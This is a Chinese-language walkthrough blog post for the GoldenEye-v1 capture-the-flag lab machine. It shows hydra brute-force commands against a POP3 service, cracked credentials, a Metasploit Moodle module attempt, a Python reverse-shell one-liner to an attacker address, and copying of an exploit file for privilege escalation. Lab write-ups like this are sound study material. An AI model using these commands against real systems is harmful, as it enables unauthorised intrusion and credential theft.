zoukankan      html  css  js  c++  java
  • GoldenEye-v1靶机

    仅供个人娱乐

    靶机信息

    下载地址:https://pan.baidu.com/s/1dzs_qx-YwYHk-vanbUeIxQ

    一、主机扫描

    二、信息收集

    三、漏洞的查找和利用

      boris    InvincibleHack3r

    进行登录

    转化为小写登录成功

    pop3 为55007端口

    爆破

    hydra -L 2.txt -P /usr/share/wordlists/fasttrack.txt pop3://192.168.56.130 -s 55007

    boris        secret1!

    Boris        secret1!

    Natalya      bird

    登录pop3服务

    natalya账户

    boris账户

    发现信息

    或者使用邮箱

    xenia        RCP90rulez!

    修改host 文件

    windows出现问题(别尝试windows 有毒  慎重)    选择kali

    修改hosts文件,访问severnaya-station.com/gnocertdir,是一个moodle学习管理系统

    xenia        RCP90rulez!  登录

    信息收集

    得到用户名:“doak”,我们继续爆破试试

    hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.56.130 -s 55007

    登录邮箱查看信息

    USER dr_doak

    PASS 4England!

    得到密文:“eFdpbnRlcjE5OTV4IQ==”

    密码为:“xWinter1995x!” 帐号为默认的 admin

    登录  进行信息收集

    use exploit/multi/http/moodle_cmd_exec

    运行失败,百度参考大佬

    设置路径为:Plugins— Text editors — TinyMCE HTML editor 在下拉选框中选择 “PSpellShell”

    删除hosts文件内容  同样失败

    搞不定  百度显示个人版本太高

    第二种方法

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

    反弹shell

    python -c 'import pty; pty.spawn("/bin/bash")'

    信息收集

    ssh上传

    开启:/etc/init.d/ssh start

    scp root@192.168.56.129:/root/1.c /tmp/

    编译   对c文件进行编译,有gcc,cc,cang,文件默认是gcc

    失败

    修改1.c文件 重名2.c

    scp root@192.168.56.129:/root/2.c /tmp/


     


  • 相关阅读:
    跳出iframe
    leetcode 225. Implement Stack using Queues
    leetcode 206. Reverse Linked List
    leetcode 205. Isomorphic Strings
    leetcode 203. Remove Linked List Elements
    leetcode 198. House Robber
    leetcode 190. Reverse Bits
    leetcode leetcode 783. Minimum Distance Between BST Nodes
    leetcode 202. Happy Number
    leetcode 389. Find the Difference
  • 原文地址:https://www.cnblogs.com/bingtang123/p/12877855.html
Copyright © 2011-2022 走看看